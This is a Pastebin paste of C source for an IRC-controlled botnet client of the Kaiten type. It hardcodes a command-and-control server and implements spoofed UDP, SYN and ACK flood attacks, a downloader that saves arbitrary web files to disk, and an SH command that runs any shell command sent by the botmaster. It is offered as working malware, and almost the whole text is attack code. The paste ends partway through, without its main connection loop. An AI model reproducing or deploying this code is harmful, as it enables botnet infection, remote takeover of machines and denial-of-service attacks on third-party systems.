API tools faq
paste
Advertisement
Guest User

layer 7 spoof.c

a guest
Apr 30th, 2016
56
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.42 KB | None | 0 0
raw download clone embed print report
  1.  
  2. #undef STARTUP // THIS IS A SPOOFED HTTP GET FLOOD SCRIPT
  3. #undef IDENT // THIS WILL CONNECT TO A SERVER WHICH HOLDS THE SCRIPTS
  4. #define FAKENAME "-bash" // THIS WILL EXECUTE THE SPOOFED ATTACK
  5. #define CHAN "#nix" // THIS TELLS THE HANDSHAKE WHEN TO COMPLETE
  6. #define KEY "" // YOUR ACCESS CODE
  7. int numservers=1; // NUMBER OF SERVERS NEEDED TO TAKE DOWN ANY SITE
  8. char *servers[] = { // SERVER THAT THE SCRIPT IS HOSTED ON (void*)0
  9. "184.82.196.41",
  10. (void*)0
  11. };
  12.  
  13. #include <stdarg.h>
  14. #include <errno.h>
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <string.h>
  18. #include <sys/types.h>
  19. #include <sys/stat.h>
  20. #include <fcntl.h>
  21. #include <strings.h>
  22. #include <netinet/in.h>
  23. #include <unistd.h>
  24. #include <sys/time.h>
  25. #include <sys/socket.h>
  26. #include <signal.h>
  27. #include <arpa/inet.h>
  28. #include <netdb.h>
  29. #include <time.h>
  30. #include <sys/wait.h>
  31. #include <sys/ioctl.h>
  32. int sock,changeservers=0;
  33. char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
  34. unsigned int *pids;
  35. unsigned long spoofs=0, spoofsm=0, numpids=0;
  36. int strwildmatch(const char* pattern, const char* string) {
  37. switch(*pattern) {
  38. case '\0': return *string;
  39. case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
  40. case '?': return !(*string && !strwildmatch(pattern+1, string+1));
  41. default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
  42. }
  43. }
  44. int Send(int sock, char *words, ...) {
  45. static char textBuffer[1024];
  46. va_list args;
  47. va_start(args, words);
  48. vsprintf(textBuffer, words, args);
  49. va_end(args);
  50. return write(sock,textBuffer,strlen(textBuffer));
  51. }
  52. int mfork(char *sender) {
  53. unsigned int parent, *newpids, i;
  54. if (disabled == 1) {
  55. Send(sock,"NOTICE %s :Unable to comply.\n",sender);
  56. return 1;
  57. }
  58. parent=fork();
  59. if (parent <= 0) return parent;
  60. numpids++;
  61. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  62. for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
  63. newpids[numpids-1]=parent;
  64. free(pids);
  65. pids=newpids;
  66. return parent;
  67. }
  68. unsigned long getspoof() {
  69. if (!spoofs) return rand();
  70. if (spoofsm == 1) return ntohl(spoofs);
  71. return ntohl(spoofs+(rand() % spoofsm)+1);
  72. }
  73. void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
  74. char *makestring() {
  75. char *tmp;
  76. int len=(rand()%5)+4,i;
  77. FILE *file;
  78. tmp=(char*)malloc(len+1);
  79. memset(tmp,0,len+1);
  80. if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
  81. else {
  82. int a=((rand()*rand())%45402)+1;
  83. char buf[1024];
  84. for (i=0;i<a;i++) fgets(buf,1024,file);
  85. memset(buf,0,1024);
  86. fgets(buf,1024,file);
  87. filter(buf);
  88. memcpy(tmp,buf,len);
  89. fclose(file);
  90. }
  91. return tmp;
  92. }
  93. void identd() {
  94. int sockname,sockfd,sin_size,tmpsock,i;
  95. struct sockaddr_in my_addr,their_addr;
  96. char szBuffer[1024];
  97. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
  98. my_addr.sin_family = AF_INET;
  99. my_addr.sin_port = htons(113);
  100. my_addr.sin_addr.s_addr = INADDR_ANY;
  101. memset(&(my_addr.sin_zero), 0, 8);
  102. if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
  103. if (listen(sockfd, 1) == -1) return;
  104. if (fork() == 0) return;
  105. sin_size = sizeof(struct sockaddr_in);
  106. if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
  107. for(;;) {
  108. fd_set bla;
  109. struct timeval timee;
  110. FD_ZERO(&bla);
  111. FD_SET(tmpsock,&bla);
  112. timee.tv_sec=timee.tv_usec=60;
  113. if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
  114. if (FD_ISSET(tmpsock,&bla)) break;
  115. }
  116. i = recv(tmpsock,szBuffer,1024,0);
  117. if (i <= 0 || i >= 20) exit(0);
  118. szBuffer[i]=0;
  119. if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
  120. if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
  121. Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
  122. close(tmpsock);
  123. close(sockfd);
  124. exit(0);
  125. }
  126. long pow(long a, long b) {
  127. if (b == 0) return 1;
  128. if (b == 1) return a;
  129. return a*pow(a,b-1);
  130. }
  131. u_short in_cksum(u_short *addr, int len) {
  132. register int nleft = len;
  133. register u_short *w = addr;
  134. register int sum = 0;
  135. u_short answer =0;
  136. while (nleft > 1) {
  137. sum += *w++;
  138. nleft -= 2;
  139. }
  140. if (nleft == 1) {
  141. *(u_char *)(&answer) = *(u_char *)w;
  142. sum += answer;
  143. }
  144. sum = (sum >> 16) + (sum & 0xffff);
  145. sum += (sum >> 16);
  146. answer = ~sum;
  147. return(answer);
  148. }
  149. void get(int sock, char *sender, int argc, char **argv) {
  150. int sock2,i,d;
  151. struct sockaddr_in server;
  152. unsigned long ipaddr;
  153. char buf[1024];
  154. FILE *file;
  155. unsigned char bufm[4096];
  156. if (mfork(sender) != 0) return;
  157. if (argc < 2) {
  158. Send(sock,"NOTICE %s :GET <host> <save as>\n",sender);
  159. exit(0);
  160. }
  161. if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  162. Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
  163. exit(0);
  164. }
  165. if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
  166. else strcpy(buf,argv[1]);
  167. for (i=0;i<strlen(buf) && buf[i] != '/';i++);
  168. buf[i]=0;
  169. server.sin_family = AF_INET;
  170. server.sin_port = htons(80);
  171. if ((ipaddr = inet_addr(buf)) == -1) {
  172. struct hostent *hostm;
  173. if ((hostm=gethostbyname(buf)) == NULL) {
  174. Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
  175. exit(0);
  176. }
  177. memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  178. }
  179. else server.sin_addr.s_addr = ipaddr;
  180. memset(&(server.sin_zero), 0, 8);
  181. if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  182. Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
  183. exit(0);
  184. }
  185.  
  186. Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
  187. Send(sock,"NOTICE %s :Receiving file.\n",sender);
  188. file=fopen(argv[2],"wb");
  189. while(1) {
  190. int i;
  191. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  192. if (i < 4096) bufm[i]=0;
  193. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  194. for (d+=4;d<i;d++) fputc(bufm[d],file);
  195. goto done;
  196. }
  197. }
  198. done:
  199. Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]);
  200. while(1) {
  201. int i,d;
  202. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  203. if (i < 4096) bufm[i]=0;
  204. for (d=0;d<i;d++) fputc(bufm[d],file);
  205. }
  206. fclose(file);
  207. close(sock2);
  208. exit(0);
  209. }
  210. void getspoofs(int sock, char *sender, int argc, char **argv) {
  211. unsigned long a=spoofs,b=spoofs+(spoofsm-1);
  212. if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
  213. else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
  214. }
  215. void version(int sock, char *sender, int argc, char **argv) {
  216. Send(sock,"NOTICE %s :Kaiten wa goraku\n",sender);
  217. }
  218. void nickc(int sock, char *sender, int argc, char **argv) {
  219. if (argc != 1) {
  220. Send(sock,"NOTICE %s :NICK <nick>\n",sender);
  221. return;
  222. }
  223. if (strlen(argv[1]) >= 10) {
  224. Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender);
  225. return;
  226. }
  227. Send(sock,"NICK %s\n",argv[1]);
  228. }
  229. void disable(int sock, char *sender, int argc, char **argv) {
  230. if (argc != 1) {
  231. Send(sock,"NOTICE %s :DISABLE <pass>\n",sender);
  232. Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
  233. return;
  234. }
  235. if (disabled) {
  236. Send(sock,"NOTICE %s :Already disabled.\n",sender);
  237. return;
  238. }
  239. if (strlen(argv[1]) > 254) {
  240. Send(sock,"NOTICE %s :Password too long! > 254\n",sender);
  241. return;
  242. }
  243. disabled=1;
  244. memset(dispass,0,256);
  245. strcpy(dispass,argv[1]);
  246. Send(sock,"NOTICE %s :Disable sucessful.\n");
  247. }
  248. void enable(int sock, char *sender, int argc, char **argv) {
  249. if (argc != 1) {
  250. Send(sock,"NOTICE %s :ENABLE <pass>\n",sender);
  251. Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
  252. return;
  253. }
  254. if (!disabled) {
  255. Send(sock,"NOTICE %s :Already enabled.\n",sender);
  256. return;
  257. }
  258. if (strcasecmp(dispass,argv[1])) {
  259. Send(sock,"NOTICE %s :Wrong password\n",sender);
  260. return;
  261. }
  262. disabled=0;
  263. Send(sock,"NOTICE %s :Password correct.\n",sender);
  264. }
  265. void spoof(int sock, char *sender, int argc, char **argv) {
  266. char ip[256];
  267. int i, num;
  268. unsigned long uip;
  269. if (argc != 1) {
  270. Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
  271. spoofs=0;
  272. spoofsm=0;
  273. return;
  274. }
  275. if (strlen(argv[1]) > 16) {
  276. Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
  277. return;
  278. }
  279. strcpy(ip,argv[1]);
  280. if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
  281. for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
  282. num=-(num-4);
  283. for (i=0;i<num;i++) strcat(ip,".0");
  284. uip=inet_network(ip);
  285. if (num == 0) spoofsm=1;
  286. else spoofsm=pow(256,num);
  287. spoofs=uip;
  288. }
  289. struct iphdr {
  290. unsigned int ihl:4, version:4;
  291. unsigned char tos;
  292. unsigned short tot_len;
  293. unsigned short id;
  294. unsigned short frag_off;
  295. unsigned char ttl;
  296. unsigned char protocol;
  297. unsigned short check;
  298. unsigned long saddr;
  299. unsigned long daddr;
  300. };
  301. struct udphdr {
  302. unsigned short source;
  303. unsigned short dest;
  304. unsigned short len;
  305. unsigned short check;
  306. };
  307. struct tcphdr {
  308. unsigned short source;
  309. unsigned short dest;
  310. unsigned long seq;
  311. unsigned long ack_seq;
  312. unsigned short res1:4, doff:4;
  313. unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
  314. unsigned short window;
  315. unsigned short check;
  316. unsigned short urg_ptr;
  317. };
  318. struct send_tcp {
  319. struct iphdr ip;
  320. struct tcphdr tcp;
  321. char buf[20];
  322. };
  323. struct pseudo_header {
  324. unsigned int source_address;
  325. unsigned int dest_address;
  326. unsigned char placeholder;
  327. unsigned char protocol;
  328. unsigned short tcp_length;
  329. struct tcphdr tcp;
  330. char buf[20];
  331. };
  332. unsigned int host2ip(char *sender,char *hostname) {
  333. static struct in_addr i;
  334. struct hostent *h;
  335. if((i.s_addr = inet_addr(hostname)) == -1) {
  336. if((h = gethostbyname(hostname)) == NULL) {
  337. Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
  338. exit(0);
  339. }
  340. bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
  341. }
  342. return i.s_addr;
  343. }
  344. void udp(int sock, char *sender, int argc, char **argv) {
  345. unsigned int port,i=0;
  346. unsigned long psize,target,secs;
  347. struct sockaddr_in s_in;
  348. struct iphdr *ip;
  349. struct udphdr *udp;
  350. char buf[1500],*str;
  351. int get;
  352. time_t start=time(NULL);
  353. if (mfork(sender) != 0) return;
  354. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  355. if (argc < 3) {
  356. Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
  357. exit(1);
  358. }
  359. target = host2ip(sender,argv[1]);
  360. port = atoi(argv[2]);
  361. secs = atol(argv[3]);
  362. ip=(void*)buf;
  363. udp=(void*)(buf+sizeof(struct iphdr));
  364. str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
  365. memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
  366. Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]);
  367. ip->ihl = 5;
  368. ip->version = 4;
  369. ip->tos = 0;
  370. ip->tot_len = 1500;
  371. ip->frag_off = 0;
  372. ip->protocol = 17;
  373. ip->ttl = 64;
  374. ip->daddr = target;
  375. udp->len = htons(psize);
  376. s_in.sin_family = AF_INET;
  377. s_in.sin_addr.s_addr = target;
  378. for (;;) {
  379. udp->source = rand();
  380. if (port) udp->dest = htons(port);
  381. else udp->dest = rand();
  382. udp->check = in_cksum((u_short *)buf,1500);
  383. ip->saddr = getspoof();
  384. ip->id = rand();
  385. ip->check = in_cksum((u_short *)buf,1500);
  386. s_in.sin_port = udp->dest;
  387. sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
  388. if (i >= 50) {
  389. if (time(NULL) >= start+secs) exit(0);
  390. i=0;
  391. }
  392. i++;
  393. }
  394. }
  395. void pan(int sock, char *sender, int argc, char **argv) {
  396. struct send_tcp send_tcp;
  397. struct pseudo_header pseudo_header;
  398. struct sockaddr_in sin;
  399. unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
  400. unsigned int psize=20, source, dest, check;
  401. unsigned long saddr, daddr,secs;
  402. int get;
  403. time_t start=time(NULL);
  404. if (mfork(sender) != 0) return;
  405. if (argc < 3) {
  406. Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
  407. exit(1);
  408. }
  409. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  410. {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
  411. daddr=host2ip(sender,argv[1]);
  412. secs=atol(argv[3]);
  413. Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
  414. send_tcp.ip.ihl = 5;
  415. send_tcp.ip.version = 4;
  416. send_tcp.ip.tos = 16;
  417. send_tcp.ip.frag_off = 64;
  418. send_tcp.ip.ttl = 64;
  419. send_tcp.ip.protocol = 6;
  420. send_tcp.tcp.ack_seq = 0;
  421. send_tcp.tcp.doff = 10;
  422. send_tcp.tcp.res1 = 0;
  423. send_tcp.tcp.cwr = 0;
  424. send_tcp.tcp.ece = 0;
  425. send_tcp.tcp.urg = 0;
  426. send_tcp.tcp.ack = 0;
  427. send_tcp.tcp.psh = 0;
  428. send_tcp.tcp.rst = 0;
  429. send_tcp.tcp.fin = 0;
  430. send_tcp.tcp.syn = 1;
  431. send_tcp.tcp.window = 30845;
  432. send_tcp.tcp.urg_ptr = 0;
  433. dest=htons(atoi(argv[2]));
  434. while(1) {
  435. source=rand();
  436. if (atoi(argv[2]) == 0) dest=rand();
  437. saddr=getspoof();
  438. send_tcp.ip.tot_len = htons(40+psize);
  439. send_tcp.ip.id = rand();
  440. send_tcp.ip.saddr = saddr;
  441. send_tcp.ip.daddr = daddr;
  442. send_tcp.ip.check = 0;
  443. send_tcp.tcp.source = source;
  444. send_tcp.tcp.dest = dest;
  445. send_tcp.tcp.seq = rand();
  446. send_tcp.tcp.check = 0;
  447. sin.sin_family = AF_INET;
  448. sin.sin_port = dest;
  449. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  450. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  451. check = rand();
  452. send_tcp.buf[9]=((char*)&check)[0];
  453. send_tcp.buf[10]=((char*)&check)[1];
  454. send_tcp.buf[11]=((char*)&check)[2];
  455. send_tcp.buf[12]=((char*)&check)[3];
  456. pseudo_header.source_address = send_tcp.ip.saddr;
  457. pseudo_header.dest_address = send_tcp.ip.daddr;
  458. pseudo_header.placeholder = 0;
  459. pseudo_header.protocol = IPPROTO_TCP;
  460. pseudo_header.tcp_length = htons(20+psize);
  461. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  462. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  463. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
  464. sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  465. if (a >= 50) {
  466. if (time(NULL) >= start+secs) exit(0);
  467. a=0;
  468. }
  469. a++;
  470. }
  471. close(get);
  472. exit(0);
  473. }
  474. void tsunami(int sock, char *sender, int argc, char **argv) {
  475. struct send_tcp send_tcp;
  476. struct pseudo_header pseudo_header;
  477. struct sockaddr_in sin;
  478. unsigned int psize=1400, check,i;
  479. unsigned long saddr, daddr,secs;
  480. int get;
  481. time_t start=time(NULL);
  482. if (mfork(sender) != 0) return;
  483. if (argc < 2) {
  484. Send(sock,"NOTICE %s :TSUNAMI <target> <secs>\n",sender);
  485. exit(1);
  486. }
  487. secs=atol(argv[2]);
  488. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  489. srand(time(NULL) ^ getpid());
  490. memset(send_tcp.buf,rand(),psize);
  491. daddr=host2ip(sender,argv[1]);
  492. Send(sock,"NOTICE %s :Tsunami heading for %s.\n",sender,argv[1]);
  493. while(1) {
  494. saddr=getspoof();
  495. send_tcp.ip.ihl = 5;
  496. send_tcp.ip.version = 4;
  497. send_tcp.ip.tos = 16;
  498. send_tcp.ip.tot_len = htons(40+psize);
  499. send_tcp.ip.id = rand();
  500. send_tcp.ip.frag_off = 64;
  501. send_tcp.ip.ttl = 64;
  502. send_tcp.ip.protocol = 6;
  503. send_tcp.ip.check = 0;
  504. send_tcp.ip.saddr = saddr;
  505. send_tcp.ip.daddr = daddr;
  506. send_tcp.tcp.source = rand();
  507. send_tcp.tcp.dest = rand();
  508. send_tcp.tcp.seq = rand();
  509. send_tcp.tcp.ack_seq = rand();
  510. send_tcp.tcp.doff = 5;
  511. send_tcp.tcp.res1 = 0;
  512. send_tcp.tcp.cwr = 0;
  513. send_tcp.tcp.ece = 0;
  514. send_tcp.tcp.urg = 0;
  515. send_tcp.tcp.ack = 1;
  516. send_tcp.tcp.psh = 1;
  517. send_tcp.tcp.rst = 0;
  518. send_tcp.tcp.fin = 0;
  519. send_tcp.tcp.syn = 0;
  520. send_tcp.tcp.window = 30845;
  521. send_tcp.tcp.check = 0;
  522. send_tcp.tcp.urg_ptr = 0;
  523. sin.sin_family = AF_INET;
  524. sin.sin_port = send_tcp.tcp.dest;
  525. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  526. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  527. check = in_cksum((unsigned short *)&send_tcp, 40);
  528. pseudo_header.source_address = send_tcp.ip.saddr;
  529. pseudo_header.dest_address = send_tcp.ip.daddr;
  530. pseudo_header.placeholder = 0;
  531. pseudo_header.protocol = IPPROTO_TCP;
  532. pseudo_header.tcp_length = htons(20+psize);
  533. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  534. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  535. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
  536. sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  537. if (i >= 50) {
  538. if (time(NULL) >= start+secs) break;
  539. i=0;
  540. }
  541. i++;
  542. }
  543. close(get);
  544. exit(0);
  545. }
  546. void unknown(int sock, char *sender, int argc, char **argv) {
  547. int flag=1,fd,i;
  548. unsigned long secs;
  549. char *buf=(char*)malloc(9216);
  550. struct hostent *hp;
  551. struct sockaddr_in in;
  552. time_t start=time(NULL);
  553. if (mfork(sender) != 0) return;
  554. if (argc < 2) {
  555. Send(sock,"NOTICE %s :UNKNOWN <target> <secs>\n",sender);
  556. exit(1);
  557. }
  558. secs=atol(argv[2]);
  559. memset((void*)&in,0,sizeof(struct sockaddr_in));
  560. in.sin_addr.s_addr=host2ip(sender,argv[1]);
  561. in.sin_family = AF_INET;
  562. Send(sock,"NOTICE %s :Unknowning %s.\n",sender,argv[1]);
  563. while(1) {
  564. in.sin_port = rand();
  565. if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
  566. else {
  567. flag=1;
  568. ioctl(fd,FIONBIO,&flag);
  569. sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
  570. close(fd);
  571. }
  572. if (i >= 50) {
  573. if (time(NULL) >= start+secs) break;
  574. i=0;
  575. }
  576. i++;
  577. }
  578. close(fd);
  579. exit(0);
  580. }
  581. void move(int sock, char *sender, int argc, char **argv) {
  582. if (argc < 1) {
  583. Send(sock,"NOTICE %s :MOVE <server>\n",sender);
  584. exit(1);
  585. }
  586. server=strdup(argv[1]);
  587. changeservers=1;
  588. close(sock);
  589. }
  590. void help(int sock, char *sender, int argc, char **argv) {
  591. if (mfork(sender) != 0) return;
  592. Send(sock,"NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls\n",sender); sleep(2);
  593. Send(sock,"NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n",sender); sleep(2);
  594. Send(sock,"NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n",sender); sleep(2);
  595. Send(sock,"NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder\n",sender); sleep(2);
  596.  
  597. Send(sock,"NOTICE %s :NICK <nick> = Changes the nick of the client\n",sender); sleep(2);
  598. Send(sock,"NOTICE %s :SERVER <server> = Changes servers\n",sender); sleep(2);
  599. Send(sock,"NOTICE %s :GETSPOOFS = Gets the current spoofing\n",sender); sleep(2);
  600. Send(sock,"NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n",sender); sleep(2);
  601.  
  602. Send(sock,"NOTICE %s :DISABLE = Disables all packeting from this client\n",sender); sleep(2);
  603. Send(sock,"NOTICE %s :ENABLE = Enables all packeting from this client\n",sender); sleep(2);
  604.  
  605. Send(sock,"NOTICE %s :KILL = Kills the client\n",sender); sleep(2);
  606. Send(sock,"NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n",sender); sleep(2);
  607. Send(sock,"NOTICE %s :VERSION = Requests version of client\n",sender); sleep(2);
  608. Send(sock,"NOTICE %s :KILLALL = Kills all current packeting\n",sender); sleep(2);
  609. Send(sock,"NOTICE %s :HELP = Displays this\n",sender);
  610.  
  611. Send(sock,"NOTICE %s :IRC <command> = Sends this command to the server\n",sender); sleep(2);
  612. Send(sock,"NOTICE %s :SH <command> = Executes a command\n",sender); sleep(2);
  613. exit(0);
  614. }
  615. void killall(int sock, char *sender, int argc, char **argv) {
  616. unsigned long i;
  617. for (i=0;i<numpids;i++) {
  618. if (pids[i] != 0 && pids[i] != getpid()) {
  619. if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]);
  620. kill(pids[i],9);
  621. }
  622. }
  623. }
  624. void killd(int sock, char *sender, int argc, char **argv) {
  625. if (!disable) kill(0,9);
  626. else Send(sock,"NOTICE %s :Unable to comply.\n");
  627. }
  628. struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
  629. { "TSUNAMI", tsunami },
  630. { "PAN", pan },
  631. { "UDP", udp },
  632. { "UNKNOWN", unknown },
  633.  
  634. { "NICK", nickc },
  635. { "SERVER", move },
  636. { "GETSPOOFS", getspoofs },
  637. { "SPOOFS", spoof },
  638.  
  639. { "DISABLE", disable },
  640. { "ENABLE", enable },
  641.  
  642. { "KILL", killd },
  643. { "GET", get },
  644. { "VERSION", version },
  645. { "KILLALL", killall },
  646. { "HELP", help },
  647. { (char *)0, (void (*)(int,char *,int,char **))0 } };
  648. void _PRIVMSG(int sock, char *sender, char *str) {
  649. int i;
  650. char *to, *message;
  651. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  652. str[i]=0;
  653. to=str;
  654. message=str+i+2;
  655. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  656. sender[i]=0;
  657. if (*message == '!' && !strcasecmp(to,chan)) {
  658. char *params[12], name[1024]={0};
  659. int num_params=0, m;
  660. message++;
  661. for (i=0;i<strlen(message) && message[i] != ' ';i++);
  662. message[i]=0;
  663. if (strwildmatch(message,nick)) return;
  664. message+=i+1;
  665. if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4);
  666. if (!strncmp(message,"SH ",3)) {
  667. char buf[1024];
  668. FILE *command;
  669. if (mfork(sender) != 0) return;
  670. memset(buf,0,1024);
  671. sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
  672. command=popen(buf,"r");
  673. while(!feof(command)) {
  674. memset(buf,0,1024);
  675. fgets(buf,1024,command);
  676. Send(sock,"NOTICE %s :%s\n",sender,buf);
  677. sleep(1);
  678. }
  679. pclose(command);
  680. exit(0);
  681. }
  682. m=strlen(message);
  683. for (i=0;i<m;i++) {
  684. if (*message == ' ' || *message == 0) break;
  685. name[i]=*message;
  686. message++;
  687. }
  688. for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
  689. num_params++;
  690. if (num_params > 10) num_params=10;
  691. params[0]=name;
  692. params[num_params+1]="\0";
  693. m=1;
  694. while (*message != 0) {
  695. message++;
  696. if (m >= num_params) break;
  697. for (i=0;i<strlen(message) && message[i] != ' ';i++);
  698. params[m]=(char*)malloc(i+1);
  699. strncpy(params[m],message,i);
  700. params[m][i]=0;
  701. m++;
  702. message+=i;
  703. }
  704. for (m=0; flooders[m].cmd != (char *)0; m++) {
  705. if (!strcasecmp(flooders[m].cmd,name)) {
  706. flooders[m].func(sock,sender,num_params-1,params);
  707. for (i=1;i<num_params;i++) free(params[i]);
  708. return;
  709. }
  710. }
  711. }
  712. }
  713. void _376(int sock, char *sender, char *str) {
  714. Send(sock,"MODE %s -xi\n",nick);
  715. Send(sock,"JOIN %s :%s\n",chan,key);
  716. Send(sock,"WHO %s\n",nick);
  717. }
  718. void _PING(int sock, char *sender, char *str) {
  719. Send(sock,"PONG %s\n",str);
  720. }
  721. void _352(int sock, char *sender, char *str) {
  722. int i,d;
  723. char *msg=str;
  724. struct hostent *hostm;
  725. unsigned long m;
  726. for (i=0,d=0;d<5;d++) {
  727. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  728. if (i == strlen(str)) return;
  729. }
  730. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  731. msg[i]=0;
  732. if (!strcasecmp(msg,nick) && !spoofsm) {
  733. msg=str;
  734. for (i=0,d=0;d<3;d++) {
  735. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  736. if (i == strlen(str)) return;
  737. }
  738. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  739. msg[i]=0;
  740. if ((m = inet_addr(msg)) == -1) {
  741. if ((hostm=gethostbyname(msg)) == NULL) {
  742. Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
  743. return;
  744. }
  745. memcpy((char*)&m, hostm->h_addr, hostm->h_length);
  746. }
  747. ((char*)&spoofs)[3]=((char*)&m)[0];
  748. ((char*)&spoofs)[2]=((char*)&m)[1];
  749. ((char*)&spoofs)[1]=((char*)&m)[2];
  750. ((char*)&spoofs)[0]=0;
  751. spoofsm=256;
  752. }
  753. }
  754. void _433(int sock, char *sender, char *str) {
  755. free(nick);
  756. nick=makestring();
  757. }
  758. void _NICK(int sock, char *sender, char *str) {
  759. int i;
  760. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  761. sender[i]=0;
  762. if (!strcasecmp(sender,nick)) {
  763. if (*str == ':') str++;
  764. if (nick) free(nick);
  765. nick=strdup(str);
  766. }
  767. }
